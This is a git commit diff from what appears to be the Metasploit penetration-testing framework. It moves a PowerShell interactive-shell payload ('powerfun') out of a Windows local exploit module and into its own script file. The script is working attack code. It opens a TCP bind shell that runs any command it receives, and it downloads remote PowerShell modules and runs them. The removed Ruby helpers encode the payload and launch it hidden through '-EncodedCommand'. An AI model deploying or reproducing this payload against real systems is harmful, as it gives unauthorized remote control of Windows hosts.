Move script out of module

2015-04-19 21:12:23 +01:00 · 2015-04-19 21:12:23 +01:00 · 8bd0da580d
parent 9fd3d3aa8c
commit 8bd0da580d
2 changed files with 54 additions and 107 deletions
--- a/data/exploits/powershell/powerfun.ps1
+++ b/data/exploits/powershell/powerfun.ps1
@ -0,0 +1,44 @@
+function Get-Webclient {
+    $wc = New-Object Net.WebClient
+    $wc.UseDefaultCredentials = $true
+    $wc.Proxy.Credentials = $wc.Credentials
+    $wc
+}
+
+function powerfun($download) {
+    $modules = @(MODULES_REPLACE)
+    $listener = [System.Net.Sockets.TcpListener]LPORT_REPLACE
+    $listener.start()
+    [byte[]]$bytes = 0..255|%{0}
+    $client = $listener.AcceptTcpClient()
+    $stream = $client.GetStream()
+
+    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n 'Get-Help Module-Name -Full' for more details on any module.`n 'Get-Module -ListAvailable' for a list of loaded cmdlets.`n`n")
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+
+    if ($download -eq 1) { ForEach ($module in $modules)
+    {
+       (Get-Webclient).DownloadString($module)|Invoke-Expression
+    }}
+
+    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
+    {
+        $EncodedText = New-Object System.Text.ASCIIEncoding
+        $data = $EncodedText.GetString($bytes,0, $i)
+        $sendback = (Invoke-Expression $data 2>&1 | Out-String )
+
+        $sendback2  = $sendback + "PS " + (get-location).Path + "> "
+     $x = ($error[0] | out-string)
+     $error.clear()
+        $sendback2 = $sendback2 + $x
+
+        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
+        $stream.Write($sendbyte,0,$sendbyte.Length)
+        $stream.Flush()  
+    }
+    $client.Close()
+    $listener.Stop()
+}
+
--- a/modules/exploits/windows/local/interactive_powershell.rb
+++ b/modules/exploits/windows/local/interactive_powershell.rb
@ -9,6 +9,8 @@ require 'zlib'

 class Metasploit3 < Msf::Exploit::Local

+  include Msf::Post::Windows::Powershell
+
  def initialize(info={})
    super(update_info(info,
      'Name'                 => "Windows Local Interactive Powershell Session",
@ -24,14 +26,19 @@ class Metasploit3 < Msf::Exploit::Local
        'Dave Hardy', # changed module to load interactive powershell via bind tcp and load other powershell modules
        'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script
        'RageLtMan' # post module
-        ]
+        ],
+      'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
+      'Targets'       =>
+        [
+          [ 'Windows', { } ],
+        ],
    ))

    register_options(
      [
        OptString.new( 'LOAD_MODULES',  [false, 'A list of powershell modules seperated by a comma, for example set LOAD_MODULES http://www.powershell.com/power1.ps1,http://www.powershell.com/power2.ps1,', ""]),
-        OptString.new( 'RHOST',  [false, 'The IP of the system being exploited = rhost', ""]),
-        OptString.new( 'LPORT',  [false, 'The PORT of the PowerShell listener = lpost', "55555"])
+#        OptString.new( 'RHOST',  [false, 'The IP of the system being exploited = rhost', ""]),
+#        OptString.new( 'LPORT',  [false, 'The PORT of the PowerShell listener = lpost', "55555"])
      ], self.class)

    register_advanced_options(
@ -55,64 +62,6 @@ class Metasploit3 < Msf::Exploit::Local
    print_status("Multi/handler started: payload=windows/shell_bind_tcp rhost=" + rhost + " lport=" + rport)
  end

-  #
-  # Return a zlib compressed powershell script
-  #
-  def compress_script(script_in, eof = nil)
-
-    # Compress using the Deflate algorithm
-    compressed_stream = ::Zlib::Deflate.deflate(script_in,
-      ::Zlib::BEST_COMPRESSION)
-
-    # Base64 encode the compressed file contents
-    encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-    # Build the powershell expression
-    # Decode base64 encoded command and create a stream object
-    psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-    psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
-    # Read & delete the first two bytes due to incompatibility with MS
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    # Uncompress and invoke the expression (execute)
-    psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
-    psh_expression += "$(New-Object IO.Compression.DeflateStream("
-    psh_expression += "$stream,"
-    psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
-    psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-    # If eof is set, add a marker to signify end of script output
-    if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
-
-    # Convert expression to unicode
-    unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-    # Base64 encode the unicode expression
-    encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-    return encoded_expression
-  end
-
-  #
-  # Execute a powershell script and return the results. The script is never written
-  # to disk.
-  #
-  def execute_script(script, time_out = 15)
-    running_pids, open_channels = [], []
-    # Execute using -EncodedCommand
-    session.response_timeout = time_out
-    cmd_out = session.sys.process.execute("powershell -EncodedCommand " +
-      "#{script}", nil, {'Hidden' => true, 'Channelized' => true})
-
-    # Add to list of running processes
-    running_pids << cmd_out.pid
-
-    # Add to list of open channels
-    open_channels << cmd_out
-
-    return [cmd_out, running_pids, open_channels]
-  end
-
  def exploit
    @client = client
    if (datastore['LOAD_MODULES'].empty?)
@ -133,52 +82,6 @@ class Metasploit3 < Msf::Exploit::Local
      print("\n")
    end

-    script_in=""+
-    "function Get-Webclient {\n"+
-    "    $wc = New-Object Net.WebClient\n"+
-    "    $wc.UseDefaultCredentials = $true\n"+
-    "    $wc.Proxy.Credentials = $wc.Credentials\n"+
-    "    $wc\n"+
-    "}\n"+
-    "\n"+
-    "function powerfun($download) {\n"+
-    "\n"+
-    "   $modules = @("+ modsall + ")\n"+
-    "    $listener = [System.Net.Sockets.TcpListener]"+datastore['LPORT']+"\n"+
-    "    $listener.start()\n"+
-    "    [byte[]]$bytes = 0..255|%{0}\n"+
-    "    $client = $listener.AcceptTcpClient()\n"+
-    "    $stream = $client.GetStream() \n"+
-    "\n"+
-        "$sendbytes = ([text.encoding]::ASCII).GetBytes(\"Windows PowerShell`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n 'Get-Help Module-Name -Full' for more details on any module.`n 'Get-Module -ListAvailable' for a list of loaded cmdlets.`n`n\")\n"+
-        "$stream.Write($sendbytes,0,$sendbytes.Length)\n"+
-        "$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')\n"+
-        "$stream.Write($sendbytes,0,$sendbytes.Length)\n"+
-    "\n"+
-    "    if ($download -eq 1) { ForEach ($module in $modules)\n"+
-    "    {\n"+
-    "       (Get-Webclient).DownloadString($module)|Invoke-Expression\n"+
-    "    }}\n"+
-    "\n"+
-    "    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\n"+
-    "    {\n"+
-    "        $EncodedText = New-Object System.Text.ASCIIEncoding\n"+
-    "        $data = $EncodedText.GetString($bytes,0, $i)\n"+
-    "        $sendback = (Invoke-Expression $data 2>&1 | Out-String )\n"+
-    "\n"+
-    "        $sendback2  = $sendback + \"PS \" + (get-location).Path + \"> \"\n"+
-    "     $x = ($error[0] | out-string)\n"+
-    "     $error.clear()\n"+
-    "        $sendback2 = $sendback2 + $x\n"+
-    "\n"+
-    "        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)\n"+
-    "        $stream.Write($sendbyte,0,$sendbyte.Length)\n"+
-    "        $stream.Flush()  \n"+
-    "    }\n"+
-    "    $client.Close()\n"+
-    "    $listener.Stop()\n"+
-    "}\n"+
-    "\n"

    if (datastore['LOAD_MODULES'].empty?)
    script_in = script_in + "powerfun \n"